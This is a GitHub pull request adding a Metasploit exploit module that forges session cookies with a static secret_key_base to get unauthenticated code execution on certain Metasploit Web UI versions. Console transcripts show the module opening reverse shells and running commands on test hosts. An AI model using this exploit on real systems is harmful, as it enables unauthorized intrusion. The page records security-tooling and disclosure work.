Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

add module metasploit_static_secret_key_base #7341

Merged
merged 4 commits into from
Sep 23, 2016
Merged

add module metasploit_static_secret_key_base #7341

merged 4 commits into from
Sep 23, 2016

Conversation

justinsteven
Copy link
Contributor

@justinsteven justinsteven commented Sep 19, 2016
edited by pbarry-r7
Loading

Exploits the issues detailed in:

Heavily based on exploits/multi/http/rails_secret_deserialization.

Verification

  • Install Metasploit Community, Express or Pro as a victim
  • Install a Weekly Release that has a static secret_key_base baked in (see the list in Targets)
  • Start msfconsole
  • use exploit/multi/http/metasploit_static_secret_key_base
  • Set 'RHOST', 'payload' and payload options
  • exploit
  • Verify gets a shell

Sample

msf > use exploit/multi/http/metasploit_static_secret_key_base
msf exploit(metasploit_static_secret_key_base) > info

       Name: Metasploit Web UI Static secret_key_base Value
     Module: exploit/multi/http/metasploit_static_secret_key_base
   Platform: Ruby
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-15

Provided by:
  Justin Steven
  joernchen of Phenoelit <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      3790             yes       The target port
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to the Metasploit Web UI
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits the Web UI for Metasploit Community, Express
  and Pro where one of a certain set of Weekly Releases have been
  applied. These Weekly Releases introduced a static secret_key_base
  value. Knowledge of the static secret_key_base value allows for
  deserialization of a crafted Ruby Object, achieving code execution.
  This module is based on
  exploits/multi/http/rails_secret_deserialization

References:
  OVE (20160904-0002)
  https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401
  https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md

msf exploit(metasploit_static_secret_key_base) > show options

Module options (exploit/multi/http/metasploit_static_secret_key_base):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      3790             yes       The target port
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the Metasploit Web UI
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001


msf exploit(metasploit_static_secret_key_base) > set RHOST 172.18.0.2
RHOST => 172.18.0.2
msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
LPORT => 4444
msf exploit(metasploit_static_secret_key_base) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Checking for cookie _ui_session
[*] Searching for proper SECRET
[*] Sending cookie _ui_session
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:53368) at 2016-09-20 07:03:34 +1000

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

@wvu
Copy link
Contributor

wvu commented Sep 20, 2016

Badass.

bcook-r7
bcook-r7 reviewed Sep 20, 2016
View reviewed changes
modules/exploits/multi/http/metasploit_static_secret_key_base.rb
[
['Metasploit 4.12.0-2016061501 to 4.12.0-2016083001',
{
'RAILSVERSION' => 4, # The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
Copy link
Contributor

@bcook-r7 bcook-r7 Sep 20, 2016
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

we probably don't need this configurability unless we're going to add more targets

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You're probably right. I tried to avoid changing the plumbing from rails_secret_deserialization to maintain parity (e.g. Leaving in the rails3 stuff as dead code) and wanted to avoid having magic values (e.g. The salt) inlined in the code. Should the dead code should be removed at the cost of parity? If the magic values don't belong in the target, should they be inlined in the code, or defined somewhere else?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think if you want parity, it follows that it should just extend the original module with this as a selectable target, rather than being introduced as a separate module. If this is going to be a separate module, ideally the common code moves to lib or a mixin.

Barring that, for a one-off, I'd optimize out the dead code. It's unlikely someone's going to update a working version-specific exploit just because a more generic exploit added a feature.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think if you want parity, it follows that it should just extend the original module with this as a selectable target, rather than being introduced as a separate module

I thought of that, but decided it'd inhibit discoverability

If this is going to be a separate module, ideally the common code moves to lib or a mixin.

Probably the way to go, especially if we keep cranking static secret_key_base modules out. OTOH these should die out with the Rails session cookie deserializer now defaulting to JSON.

I'd optimize out the dead code

Sounds good to me, I'll get on it

@acammack-r7 acammack-r7 self-assigned this Sep 20, 2016
@justinsteven
Tidy metasploit_static_secret_key_base module
30d07ce 
* Inline magic values
* Optimise out dead Rails3-specific code
@justinsteven
Tweak verbosity re: found secrets
1e24568
@justinsteven
Tidy info
dcfbb9e 
Replace errant \t with \x20
@justinsteven justinsteven force-pushed the add_module_metasploit_static_secret_key_base branch from 4a83fa3 to dcfbb9e Compare September 21, 2016 10:14
@pbarry-r7 pbarry-r7 self-assigned this Sep 23, 2016
@pbarry-r7
Copy link
Contributor

Verified with a Pro install which was upgraded to 4.12.0-2016081201:

$ ./msfconsole

                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v4.12.27-dev-dcfbb9e                 ]
+ -- --=[ 1580 exploits - 901 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/metasploit_static_secret_key_base
msf exploit(metasploit_static_secret_key_base) > show options

Module options (exploit/multi/http/metasploit_static_secret_key_base):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      3790             yes       The target port
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the Metasploit Web UI
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(metasploit_static_secret_key_base) > set rhost 10.0.2.16
rhost => 10.0.2.16
msf exploit(metasploit_static_secret_key_base) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(metasploit_static_secret_key_base) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Checking for cookie _ui_session
[*] Searching for proper secret
[*] Found secret, detected version 4.12.0_2016081201
[*] Sending cookie _ui_session
[*] Command shell session 1 opened (10.0.2.4:4444 -> 10.0.2.16:51064) at 2016-09-23 09:11:49 -0500


ls  
CREDITS
README.md
Rakefile
app
bin
bower.json
conf
config
config.ru
db
doc
lib
licenses
log
metasploit-pro-ui.gemspec
public
script
scripts
tmp
vendor

pwd
/opt/metasploit/apps/pro/ui

Nice work, @justinsteven! I'll land this PR shortly...

@pbarry-r7 pbarry-r7 merged commit dcfbb9e into rapid7:master Sep 23, 2016
pbarry-r7 added a commit that referenced this pull request Sep 23, 2016
@pbarry-r7
Land #7341, add module metasploit_static_secret_key_base
5de1d34
@pbarry-r7
Copy link
Contributor

pbarry-r7 commented Sep 23, 2016
edited
Loading

Release Notes

This module allows the user to exploit certain upgraded versions of Metasploit Community, Express, and Pro by forging a session cookie, allowing remote code execution. Upgrade versions of Metasploit Community, Express, and Pro 4.12.0-2016061501 through 4.12.0-2016083001 are vulnerable (full installs of these versions are not vulnerable, only the upgrades). Authentication is not required to exploit this vulnerability. See this blog post for more details: https://community.rapid7.com/community/metasploit/blog/2016/09/19/important-security-fixes-in-metasploit-4120-2016091401

@bcook-r7
Copy link
Contributor

Thanks @pbarry-r7 !

@shipcod3
Copy link
Contributor

this is cool man

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcook-r7 bcook-r7 bcook-r7 left review comments

Assignees

@lsato-r7 lsato-r7

@acammack-r7 acammack-r7

@pbarry-r7 pbarry-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
7 participants
@justinsteven @wvu @pbarry-r7 @bcook-r7 @shipcod3 @lsato-r7 @acammack-r7